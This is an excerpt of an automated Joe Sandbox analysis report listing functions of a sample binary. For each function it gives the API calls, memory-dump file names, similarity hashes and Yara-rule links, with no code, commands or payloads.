Instruction Fuzzy Hash: F1113035D0051DD7CF00DFA5D944AEEBBB8FF1E711F054066DA41B2250CB785954CB99

Function 004A1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004A1B19

Strings

EXISTS, xrefs: 004A1B41
APPEND, xrefs: 004A1B52
KEYS, xrefs: 004A1B30
REMOVE, xrefs: 004A1B1F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: edb6a4c408f124187444287854d24d967233820e2af6bf2e6a2e95bfca489195
Instruction ID: 1a6a4ca743a8d38f77600dda19eabd3f0910e6d5b5229a0a2c302e858c8b0a46
Opcode Fuzzy Hash: edb6a4c408f124187444287854d24d967233820e2af6bf2e6a2e95bfca489195
Instruction Fuzzy Hash: 781130719001189FCF00DF95D8518BFB7B5BF26308F50846AD8645B262EB3A6906DB58

Function 004BEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004BEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 004BEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004BED6A
CloseHandle.KERNEL32(?), ref: 004BEDEB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 91380bf53a940d4f3314f60e45cd95701705ba6bfb1f8dedf4afd145224bfc34
Instruction ID: f153e43f34b8605c1141939502307cfcf40414c46bfb0995e68e9a9078bc7a35
Opcode Fuzzy Hash: 91380bf53a940d4f3314f60e45cd95701705ba6bfb1f8dedf4afd145224bfc34
Instruction Fuzzy Hash: 898192716043019FE760EF29C846F6BB7E5AF84714F04881EF9559B392DAB4EC04CB99

Function 0046541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046547B
_memcpy_s.LIBCMT ref: 004654ED
__read_nolock.LIBCMT ref: 0046554B
__filbuf.LIBCMT ref: 0046556E
_memset.LIBCMT ref: 004655B2

Part of subcall function 00468B28: __getptd_noexit.LIBCMT ref: 00468B28

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: b7d53e2767513ed100bee04c5db2fb6546eb663e40cde8b1da00465072fb5b2d
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 9551DB70A00B05EBCB248E65D84466F77B2AF40324F14876FF426963D4FB799D518B4B

Function 004C0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 004C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004BFDAD,?,?), ref: 004C0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004C00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004C013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004C0183
RegCloseKey.ADVAPI32(?,?), ref: 004C01AF
RegCloseKey.ADVAPI32(00000000), ref: 004C01BC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 69a54f88a2d195ed133218bff0069cf5d3ea5efab0f332303fb29330da034582
Instruction ID: bd3594615e45cab1c77ee066680bfa90bc2d443ca8e3274d28a42d1f357252d8
Opcode Fuzzy Hash: 69a54f88a2d195ed133218bff0069cf5d3ea5efab0f332303fb29330da034582
Instruction Fuzzy Hash: 54518B71208204AFD740EF59C881F6BB7E9FF84318F04882EF485872A2DB39E905CB56

Function 004BD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004BD927
GetProcAddress.KERNEL32(00000000,?), ref: 004BD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 004BD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 004BDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004BDA21

Part of subcall function 00445A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,004A7896,?,?,00000000), ref: 00445A2C
Part of subcall function 00445A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,004A7896,?,?,00000000,?,?), ref: 00445A50

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: bb4b36e64b902894cd3c9de43376845d9bc9547abd74d2acea70fe7abd6737aa
Instruction ID: 72ef53f5fed9f83501dc382ee892d17a77b310795026af37859b6927e3732e68
Opcode Fuzzy Hash: bb4b36e64b902894cd3c9de43376845d9bc9547abd74d2acea70fe7abd6737aa
Instruction Fuzzy Hash: 24512975A00205DFDB00EFA9C4849AEB7F5FF09324B0480AAE955AB312DB39ED45CF95

Function 004AE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004AE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004AE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004AE687

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004AE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004AE6B4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 2c48b8b963805392bc2156505984811c74f84bfb72a989d5f95c2026c5f82ca9
Instruction ID: aa74d17501c817899a7d5a83842785b992b735da6ba5d19e8bbd11622662ed7e
Opcode Fuzzy Hash: 2c48b8b963805392bc2156505984811c74f84bfb72a989d5f95c2026c5f82ca9
Instruction Fuzzy Hash: EC515D35A00105DFDB00EF65C981AAEBBF5EF49314B1484AAE819AB362CB36ED11DF54

Function 004CA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887d456c5d54c0b2a7fa44a9b9102caf59db8131d444ef6fdb4239bde06da6d4
Instruction ID: e4504665ddc75f99b7a9f17e4128f1c03986a95d74fe1232eefcbacc501a0871
Opcode Fuzzy Hash: 887d456c5d54c0b2a7fa44a9b9102caf59db8131d444ef6fdb4239bde06da6d4
Instruction Fuzzy Hash: 9441383D904108AFD790CF34CC48FAABBA4EB09354F18416AF815A73E1CF389D65DA5A

Function 00442344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00442357
ScreenToClient.USER32(005057B0,?), ref: 00442374
GetAsyncKeyState.USER32(00000001), ref: 00442399
GetAsyncKeyState.USER32(00000002), ref: 004423A7

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: bc0987fdc1136e50bdedf4baa0fb4f42e33064b53e16651a31e48c8b7440454c
Instruction ID: ab5877ff49e83fc3e78b01d3c66e446b703cef1cc1e92f1dec2afab8cf7e367f
Opcode Fuzzy Hash: bc0987fdc1136e50bdedf4baa0fb4f42e33064b53e16651a31e48c8b7440454c
Instruction Fuzzy Hash: C741A135604105FBDF158F69C884FEABB74FB05324F20832BF82892290CB789D94DB99

Function 004963AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004963E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00496433
TranslateMessage.USER32(?), ref: 0049645C
DispatchMessageW.USER32(?), ref: 00496466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00496475

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 407b171a2309fca329bc4ebd84df4f3397fa6e4955f59751cb2b2f71275c793b
Instruction ID: 5ddffc521a2222bf0f77535de2b5df822468b38937f68aabd78be275d5df7ea3
Opcode Fuzzy Hash: 407b171a2309fca329bc4ebd84df4f3397fa6e4955f59751cb2b2f71275c793b
Instruction Fuzzy Hash: FC31B431500646AFDF64CFB48C44FBB7FACAB11304F154176E821C62A1E72D9449EB69

Function 00498A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00498A30
PostMessageW.USER32(?,00000201,00000001), ref: 00498ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00498AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00498AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00498AF8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bc8628e9c95b64756a086c7df601d1afd8e89cd843182b99adfec1e64c75613c
Instruction ID: afdd1d1e1b496b97a424c829551e834b81641c99b380f3108642a76a0e2914d3
Opcode Fuzzy Hash: bc8628e9c95b64756a086c7df601d1afd8e89cd843182b99adfec1e64c75613c
Instruction Fuzzy Hash: 3931BF71500219EBDF14CFACD94CA9E3BB5EB05315F10823AF925E62D0CBB89914DB95

Function 0049B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0049B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0049B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0049B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0049B27F
_wcsstr.LIBCMT ref: 0049B289

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 6d6b9633c8b50596722ae0ed1314699a63b8861c2f72466b25b97732243e7bef
Instruction ID: 3cb0da87148c57a6d3af2997da69491378e04c355678249170ec2772c8285538
Opcode Fuzzy Hash: 6d6b9633c8b50596722ae0ed1314699a63b8861c2f72466b25b97732243e7bef
Instruction Fuzzy Hash: 112125312042007AEF155B75ED09E7F7F99DF49710F00417FF804CA2A1EB69DC4196A9

Function 004CB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

GetWindowLongW.USER32(?,000000F0), ref: 004CB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 004CB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004CB1CF
GetSystemMetrics.USER32(00000004), ref: 004CB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004B0E90,00000000), ref: 004CB216

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 1469dd2ea09af94c32dcfc71869f5ae1d6fff1a6fdf61d176c8ffe4170c9d307
Instruction ID: 3a135923165f853fcd68bfd2e30bd2c99f8f8250c552953b287e506901c4f0b2
Opcode Fuzzy Hash: 1469dd2ea09af94c32dcfc71869f5ae1d6fff1a6fdf61d176c8ffe4170c9d307
Instruction Fuzzy Hash: 1A21A035A10611AFCB908F38DC09F6B3BA4FB15361F14473ABD22D32E0EB3498119B88

Function 00499307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00499320

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00499352
__itow.LIBCMT ref: 0049936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00499392
__itow.LIBCMT ref: 004993A3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 6f1281d2245949e5dd6c19a075956ad5d864ad7bc5244548673090da5286ac22
Instruction ID: 186f167f41f60f975a2cb401c2e88a89a063d9d314f6afe129b8bf3c1c529374
Opcode Fuzzy Hash: 6f1281d2245949e5dd6c19a075956ad5d864ad7bc5244548673090da5286ac22
Instruction Fuzzy Hash: 2121D731700208ABDF209E6A8C85EAE7FA9EB4C714F04403FFD05D72D1D6B88D56979A

Function 004B5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004B5A6E
GetForegroundWindow.USER32 ref: 004B5A85
GetDC.USER32(00000000), ref: 004B5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 004B5ACD
ReleaseDC.USER32(00000000,00000003), ref: 004B5B08

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f00f6b315534394a07799dd9819423ec9a3a37eac601597bc65faee47ac0f443
Instruction ID: 99308943afb6663d480095f68114b51db8fbfaca0f3188ff2a1a97b4b7d867a2
Opcode Fuzzy Hash: f00f6b315534394a07799dd9819423ec9a3a37eac601597bc65faee47ac0f443
Instruction Fuzzy Hash: 9F21A175A00104AFD710EFA5DC84EAABBE5EF48310F14807EF84997362CA38AC05CB94

Function 004412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0044134D
SelectObject.GDI32(?,00000000), ref: 0044135C
BeginPath.GDI32(?), ref: 00441373
SelectObject.GDI32(?,00000000), ref: 0044139C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d58e4c1a46eef9bfa96b65eacb7ba994978c0b76eb6bb98c3874a9d5e3642eb3
Instruction ID: 20babdc643c40da89db3008139b2a9b88d43f12b0af1794105c53ce54bbbc2f9
Opcode Fuzzy Hash: d58e4c1a46eef9bfa96b65eacb7ba994978c0b76eb6bb98c3874a9d5e3642eb3
Instruction Fuzzy Hash: 25215130800608DBEB108F25DD08B6F7BE9FB10751F248227FC14961B0E7789999EF99

Function 004A4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004A4ABA
__beginthreadex.LIBCMT ref: 004A4AD8
MessageBoxW.USER32(?,?,?,?), ref: 004A4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004A4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004A4B0A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 81b16280dfdc7b9524625ddc52d9f66f779b263813614c6d76f1ca0914defbb7
Instruction ID: a7c240920c8174b11bbcc6f7cd595347db5981be5f8aa5e734f12680ae80eae8
Opcode Fuzzy Hash: 81b16280dfdc7b9524625ddc52d9f66f779b263813614c6d76f1ca0914defbb7
Instruction Fuzzy Hash: 5A112576905604BBD7008FA89C04A9F7BADEBD5320F14426AF814D3350E6B99D088BA4

Function 00498202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0049821E
GetLastError.KERNEL32(?,00497CE2,?,?,?), ref: 00498228
GetProcessHeap.KERNEL32(00000008,?,?,00497CE2,?,?,?), ref: 00498237
HeapAlloc.KERNEL32(00000000,?,00497CE2,?,?,?), ref: 0049823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00498255

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 941405e8ec9df3722e636bcd3b57e0274ec13f1d0ea74386bdd76b71be99ccb6
Instruction ID: 3fbc248fcd9bc89297cf792ea81796b205eb85468b03e70f602d777b63ab159a
Opcode Fuzzy Hash: 941405e8ec9df3722e636bcd3b57e0274ec13f1d0ea74386bdd76b71be99ccb6
Instruction Fuzzy Hash: 6D016971200604BFDF204FAADC48D6B7FAEEF8A754B50047AF809C3220DA398C04DA64

Function 0049710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

